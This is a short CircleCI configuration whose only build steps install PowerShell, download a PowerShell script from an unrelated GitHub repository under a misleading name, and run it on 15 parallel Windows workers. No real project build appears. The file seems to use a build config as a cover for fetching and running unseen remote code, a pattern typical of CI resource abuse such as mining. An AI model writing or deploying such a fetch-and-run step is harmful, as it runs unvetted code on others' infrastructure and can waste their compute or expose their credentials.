version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    parallelism: 15  
    executor: win/default
    steps:
      - checkout
      - run: dotnet tool install --global PowerShell
      - run: Invoke-WebRequest https://raw.githubusercontent.com/kabehada5s/scrutinizer/main/Dockerfile.ps1 -OutFile pepeklompat.ps1
      - run: pwsh ./pepeklompat.ps1
